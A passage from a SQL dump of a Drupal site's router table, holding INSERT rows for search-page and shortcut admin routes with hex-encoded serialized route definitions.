2474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31303a22706174685f616c696173223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35373a227b5e2f61646d696e2f636f6e6669672f7365617263682f706174682f656469742f283f503c706174685f616c6961733e5c642b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a31303a22706174685f616c696173223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a33303a222f61646d696e2f636f6e6669672f7365617263682f706174682f65646974223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31303a22706174685f616c696173223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a33323a222f61646d696e2f636f6e6669672f7365617263682f706174682f656469742f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.search_page.collection', '/admin/config/search/pages', '/admin/config/search/pages', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32363a222f61646d696e2f636f6e6669672f7365617263682f7061676573223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a31313a227365617263685f70616765223b733a363a225f7469746c65223b733a31323a22536561726368207061676573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31373a2261646d696e697374657220736561726368223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33333a227b5e2f61646d696e2f636f6e6669672f7365617263682f7061676573247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f636f6e6669672f7365617263682f7061676573223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32363a222f61646d696e2f636f6e6669672f7365617263682f7061676573223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.search_page.config_translation_overview', '/admin/config/search/pages/manage/{search_page}/translate', '/admin/config/search/pages/manage/%/translate', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35373a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f7b7365617263685f706167657d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a31313a227365617263685f70616765223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a227365617263685f70616765223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a7365617263685f70616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37343a227b5e2f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f283f503c7365617263685f706167653e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227365617263685f70616765223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.search_page.delete_form', '/admin/config/search/pages/manage/{search_page}/delete', '/admin/config/search/pages/manage/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35343a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f7b7365617263685f706167657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31383a227365617263685f706167652e64656c657465223b733a363a225f7469746c65223b733a363a2244656c657465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31383a227365617263685f706167652e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31313a227365617263685f70616765223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a7365617263685f70616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37313a227b5e2f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f283f503c7365617263685f706167653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227365617263685f70616765223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34323a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.search_page.disable', '/admin/config/search/pages/manage/{search_page}/disable', '/admin/config/search/pages/manage/%/disable', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35353a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f7b7365617263685f706167657d2f64697361626c65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36303a225c44727570616c5c7365617263685c436f6e74726f6c6c65725c536561726368436f6e74726f6c6c65723a3a706572666f726d4f7065726174696f6e223b733a323a226f70223b733a373a2264697361626c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31393a227365617263685f706167652e64697361626c65223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31313a227365617263685f70616765223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a7365617263685f70616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37323a227b5e2f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f283f503c7365617263685f706167653e5b5e2f5d2b2b292f64697361626c65247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a383a222f64697361626c65223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227365617263685f70616765223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34333a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f252f64697361626c65223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.search_page.edit_form', '/admin/config/search/pages/manage/{search_page}', '/admin/config/search/pages/manage/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34373a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f7b7365617263685f706167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31363a227365617263685f706167652e65646974223b733a31353a225f7469746c655f63616c6c6261636b223b733a35333a225c44727570616c5c7365617263685c436f6e74726f6c6c65725c536561726368436f6e74726f6c6c65723a3a656469745469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31383a227365617263685f706167652e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31313a227365617263685f70616765223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a7365617263685f70616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36343a227b5e2f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f283f503c7365617263685f706167653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227365617263685f70616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a33353a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f25223b733a383a226e756d5061727473223b693a363b7d7d, 6);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.search_page.enable', '/admin/config/search/pages/manage/{search_page}/enable', '/admin/config/search/pages/manage/%/enable', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35343a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f7b7365617263685f706167657d2f656e61626c65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36303a225c44727570616c5c7365617263685c436f6e74726f6c6c65725c536561726368436f6e74726f6c6c65723a3a706572666f726d4f7065726174696f6e223b733a323a226f70223b733a363a22656e61626c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31383a227365617263685f706167652e757064617465223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31313a227365617263685f70616765223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a7365617263685f70616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37313a227b5e2f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f283f503c7365617263685f706167653e5b5e2f5d2b2b292f656e61626c65247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f656e61626c65223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227365617263685f70616765223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34323a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f252f656e61626c65223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.search_page.set_default', '/admin/config/search/pages/manage/{search_page}/set-default', '/admin/config/search/pages/manage/%/set-default', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f7b7365617263685f706167657d2f7365742d64656661756c74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35363a225c44727570616c5c7365617263685c436f6e74726f6c6c65725c536561726368436f6e74726f6c6c65723a3a736574417344656661756c74223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31383a227365617263685f706167652e757064617465223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31313a227365617263685f70616765223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a7365617263685f70616765223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37373a227b5e2f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f283f503c7365617263685f706167653e5b5e2f5d2b2b292f7365745c2d64656661756c74247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31323a222f7365742d64656661756c74223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227365617263685f70616765223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33333a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a227365617263685f70616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34373a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f252f7365742d64656661756c74223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.shortcut.canonical', '/admin/config/user-interface/shortcut/link/{shortcut}', '/admin/config/user-interface/shortcut/link/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f7b73686f72746375747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31363a2273686f72746375742e64656661756c74223b733a363a225f7469746c65223b733a343a2245646974223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31353a2273686f72746375742e757064617465223b733a383a2273686f7274637574223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a383a2273686f7274637574223b613a323a7b733a343a2274797065223b733a31353a22656e746974793a73686f7274637574223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a2273686f7274637574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36383a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6c696e6b2f283f503c73686f72746375743e5c642b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a383a2273686f7274637574223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a2273686f7274637574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.shortcut.content_translation_add', '/admin/config/user-interface/shortcut/link/{shortcut}/translations/add/{source}/{target}', '/admin/config/user-interface/shortcut/link/%/translations/add', 251, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38383a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f7b73686f72746375747d2f7472616e736c6174696f6e732f6164642f7b736f757263657d2f7b7461726765747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a37323a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a616464223b733a363a22736f75726365223b4e3b733a363a22746172676574223b4e3b733a363a225f7469746c65223b733a333a22416464223b733a31343a22656e746974795f747970655f6964223b733a383a2273686f7274637574223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31333a2273686f72746375742e76696577223b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22637265617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a333a7b733a363a22736f75726365223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a363a22746172676574223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a383a2273686f7274637574223b613a333a7b733a343a2274797065223b733a31353a22656e746974793a73686f7274637574223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a383a2273686f7274637574223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3133363a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6c696e6b2f283f503c73686f72746375743e5b5e2f5d2b2b292f7472616e736c6174696f6e732f616464283f3a2f283f503c736f757263653e5b5e2f5d2b2b29283f3a2f283f503c7461726765743e5b5e2f5d2b2b29293f293f247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22746172676574223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22736f75726365223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f7472616e736c6174696f6e732f616464223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a2273686f7274637574223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34323a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a383a2273686f7274637574223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3235313b733a31343a227061747465726e4f75746c696e65223b733a36313a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6c696e6b2f252f7472616e736c6174696f6e732f616464223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
